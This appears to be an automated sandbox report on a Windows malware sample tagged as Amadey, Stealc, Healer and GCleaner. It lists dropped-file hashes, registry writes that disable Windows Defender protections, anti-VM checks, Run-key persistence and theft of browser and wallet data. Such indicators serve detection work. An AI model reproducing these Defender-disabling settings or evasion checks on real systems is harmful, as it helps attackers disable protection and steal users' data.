SHA256 d766bf1b66d2614cc48fdfccedcc4dfcb92a31094a1b90122801ed70e8844b2a
SHA512 ba767d0d0c8ae18c445d500a810909c78895883b4c07eaf6399f69ae3aa0abb371f67b404fea37796e5b2ad3a4602316fce716a7c8e709f7654144ed59b77dc1

C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE

MD5 fe089eca3b83b1994578132a6fca1baf
SHA1 3af85c058f9db79b1f15ec21991a37428d49d59c
SHA256 9619b104fc44c027f5afc9ebeb8767820136ef80f68b7e7dc633fb332c7e9e7b
SHA512 3e42d3e50b33ef7261a7c2220b9db4f88cd5d85e05d4d17c5bac6a6d937ded55c536152efe5002cf2f4d18e70b749789d9ce4cd97fa41195ad26aeceb0354ff4

C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\000016.dbtmp

MD5 edd71dd3bade6cd69ff623e1ccf7012d
SHA1 ead82c5dd1d2025d4cd81ea0c859414fbd136c8d
SHA256 befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
SHA512 7fa9b9ef95db0ce461de821f0dec1be8147095680b7879bad3c5752692294f94ebc202b85577b5abac9aeaf48371595dd61792786a43c0bd9b36c9fc3752669d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000017.dbtmp

MD5 d8c7ce61e1a213429b1f937cae0f9d7c
SHA1 19bc3b7edcd81eace8bff4aa104720963d983341
SHA256 7d3d7c3b6e16591b894a5ce28f255cb136bb6c45f5038c3b120b44b413082e35
SHA512 ffc1854cccbd5a5c1740df9d3ba48994d48ef9a585bd513f00371c68086629d45ee293336af0f27ff350614f68ee660890920773f9ebdf1c327f20a620860a15

memory/2576-1253-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SV0CHHFUI4BR4Q8OWTZC.temp

MD5 5a80620bbcd12c76ca9cd8e1c02ea6c5
SHA1 58e1deb515f5f3d981df7b5773bc0f1b051ca53f
SHA256 18039e54bfb87c6a43c8ac99abca3f295239e6cacd730df44fded9520ebe0d7a
SHA512 81f8a6d8468142698740b105731b87ba9c9b99ec5362df686f2302d29eb52c3047ce761339267653850ea234977c4cfb93339c9b16936bd80f7c2b3d8f994b01

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000014.dbtmp

MD5 ebc863bd1c035289fe8190da28b400bc
SHA1 1e63d5bda5f389ce1692da89776e8a51fa12be13
SHA256 61657118abc562d70c10cbea1e8c92fab3a92739f5445033e813c3511688c625
SHA512 f21506feeed984486121a09c1d43d4825ec1ec87f8977fa8c9cd4ff7fe15a49f74dc1b874293409bd309006c7bbc81e1c4bcba8d297c5875ca009b02e6d2b7be

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\000015.dbtmp

MD5 d1625ab188e7c8f2838b317ba36efc69
SHA1 9352ce60916471b427e9f6d8f192ae2cd9c1ecdb
SHA256 f6a28e2e41d451b4de8597a14916d7a3058ebdd8046a89109658321142660d69
SHA512 50bf78dece37f946a6229d81cb61f0cc647b78220205ebd7f265582e6b228666c6229c219c480556257a135ef5f26600a497dc66494b40779c71ec62a2fb5e42

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Extension Scripts\000019.dbtmp

MD5 e5ad213c1d147e06198eec1980e7d918
SHA1 8169b54541b0613052e7dfbdb27ded2d89c26632
SHA256 300feb3870e7d5e43b28bd6b7826d9e0c21e0e81ac1b44e9c4e35957ad0fa023
SHA512 326fa42ae471094fcddb19198fead059669f457b81aa462d93c83df47102c664bd6d4c83f069c0da06450e971ee62efe8d22a2db5aaff356a2a5591455dfd8ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\shared_proto_db\metadata\000020.dbtmp

MD5 a874f3e3462932a0c15ed8f780124fc5
SHA1 966f837f42bca5cac2357cff705b83d68245a2c2
SHA256 01bd196d6a114691ec642082ebf6591765c0168d4098a0cd834869bd11c8b87d
SHA512 382716d6fc0791ca0ccfa1efba318cff92532e04038e9b9aa4c27447ac2cac26c79da8ee7dbafae63278df240f0a8cab5efea2ee34eef2e54e884784147e6d00

C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe

MD5 e7b0c4c8f5ae60095b01cf01aba7810a
SHA1 1b3057d010d99d7630c5fffa933ee98420a809c5
SHA256 7e6fda01791cdbd22d3352856d42d7e61ae76d365df0071bc57cf39ea0517885
SHA512 c57e12f095b367bf43a1c2ded9b15120a320ebe1d7d845165e82557adb7e5f567f5b039d388b01f94bcb270acbccfd5c65c12949a1f1e90ed53206bfc76847c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

MD5 de9ef0c5bcc012a3a1131988dee272d8
SHA1 fa9ccbdc969ac9e1474fce773234b28d50951cd8
SHA256 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590
SHA512 cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\814ff061-5def-4881-a644-f1d5c55182b2.tmp

MD5 3e1f2d88d4e99ca91ada15df1bf1736f
SHA1 9a0554feb916e839798ab445d8d9ff5b09b2412a
SHA256 6707f722786f8e43581bdedc4f12c02a622b45720fcd46703aa2f0887d44a718
SHA512 f12bb356b9e736105fd30801bdae8a2a51eaf11512bd31ce195d2e02fb3442afa97acde812446199dcfbeae05981d94e4f13c1346ae7cf1c1bb5c4b8a01eb1ae

C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe

MD5 7ebfd3c200d1cef79141205b2232d04e
SHA1 9507b4780dc90ac98995ab6987cb76cc3e85cf3d
SHA256 ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38
SHA512 17cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f

C:\ProgramData\freebl3.dll

MD5 550686c0ee48c386dfcb40199bd076ac
SHA1 ee5134da4d3efcb466081fb6197be5e12a5b22ab
SHA256 edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
SHA512 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

C:\ProgramData\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/608-1550-0x00000000011E0000-0x0000000001258000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\vcruntime140.dll

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe

MD5 cc1a40ae718a316ece1fa40898297c32
SHA1 1400b072dffc6b9300e48b35bbb8f9f9a93ae357
SHA256 0f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c
SHA512 af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd

C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe

MD5 ecbd88e7bb854e4ce89e94f5e76d0116
SHA1 2a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd
SHA256 c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684
SHA512 cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000023.dbtmp

MD5 2091e7af40368b8a9183a08a62efc8f9
SHA1 c552e8726cfab57eeb03d5e176cedd0771382530
SHA256 368b5cdab2ff128767296bb4f19bfcd39baa627eaaf43cafba54fc223feec47f
SHA512 c4d0d89ab6ca7ed48f10c8bc3211a3a1a8776a54ff58bf79940921d6e1b06fdccb9b593ac8d4b7cc2cb80f320f72cbd3104fe2ed67b1462b9d59356c75b4b4e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\000022.dbtmp

MD5 6671db8c02f3c234bc5b756619a0ed77
SHA1 ff451a14cdd61df48cce4448f118377af77da143
SHA256 f7858098c26ef2a143b0e7cafbc03040c3c1c3185f446517108a7bdd2a6d9c4d
SHA512 1c6182196ec6086d5316c741f974e6ec4efcedc3eb835ade8df2762d2ff245f055c05ed95e06fea3e04fe3a08e9582846cf2588c31fd69fc4978440039604ba1

C:\ProgramData\C5AD1DF3C7BF0C79.dat

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe

MD5 bd75bba4bc3b2a15f3734d37ede02fe3
SHA1 431b6edb8be09f0717183731f48e7d7913121c93
SHA256 0c0dff4b73407a6055a405e8c96ec37eda7d7aab146e9b6f8273f2f1ec80437b
SHA512 523b2fd737d613dce5d8033707b9e7d3d00c2a3fce513660cd4217f7b297c0d6ad1b7faebef4a6fccccd8a3244307d1c2f7507b4167691848d1b50b08a611273

C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe

MD5 44222189950020de11889bb788149def
SHA1 95ef31887ab31e7ac6713a4652d6c1a110d81e44
SHA256 4e47387c8a0f00ecbeabeb9723822378e5d6c2583b5469ec031cfe55ace5fbb9
SHA512 ec1408190ce939ed8043cd2bd462d3ea3ec551523c101f8b67be0c1fce4db2c52f3f41f2e0a77e62d1e31af393147473c9d8ea884e2e5c1bec51327905f730fe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Extension Scripts\000025.dbtmp

MD5 20558702f92f2b0ebef7726830fe9d9f
SHA1 afc84aedb33d5342e2d0e9873293b846d3ff5c33
SHA256 0d13868aecf007c9c949ef1e6bb7106686cd4f449c92cf1ebcdca54db7b24b33
SHA512 67e023324bd327d0d065d4254e3a67bc8c233bf2db9384231318effee5125fe47ef46235c14a2246b4fbdcad992a3060ea394e16023265b4828d86cf1d119780

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\shared_proto_db\metadata\000026.dbtmp

MD5 509013020cd5cf3f4edb5ca4560e8300
SHA1 43c9c51700a273d818e7332421203541697cba4c
SHA256 765840776810ca47da891b5f31a5cc323d27d1a41d3a4e32f1cd7126a95c0361
SHA512 25761de615ce7296906f0513fcfaee3d09a76885180b8fe0c0a12d265ab9576ff78cea2e2c36b13dba225b57cedcd82013c844eaab7489cc447f620eff23eb46

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Local Storage\leveldb\CURRENT

MD5 904754a73eb4f8a75410a92b2b7a920c
SHA1 208f9e70a93742e8ca1f5e2537690172971209be
SHA256 c3225bb8babf9823a2daf2bccae0cafc5d3e0857c5f24187dc004f1b2560b4db
SHA512 cb251f3f6679b9f339c3697f64ed056ae53caf22aedbf37fb57dfe47e8c0e95f295cb180c342e415bc540a9332c0aa9253af7fd2ac17b3e80ad94bcf2cf29469

C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe

MD5 de9fdda5de6c4dfaffb86be4ee98d70a
SHA1 c0c4a6ae8003f5508c92c8bbb037c49fff06a5c3
SHA256 952b6fb34399b787bae14c027165482d38c5355e16d6f1d9f84fa62e6c7c6c92
SHA512 74e44c48e92b0f4ad763dbed41b9252072e0ad27dfef651460fd1500fdfc11ef164853aabb056a71b0d4df01975efd8bfd111565a80ad79b441ab544b1c14592

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 05:22

Reported

2025-03-06 05:25

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\563315ef27.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110560101\\563315ef27.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb0c0b51c3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110570101\\cb0c0b51c3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\299f9f82e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110580101\\299f9f82e8.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
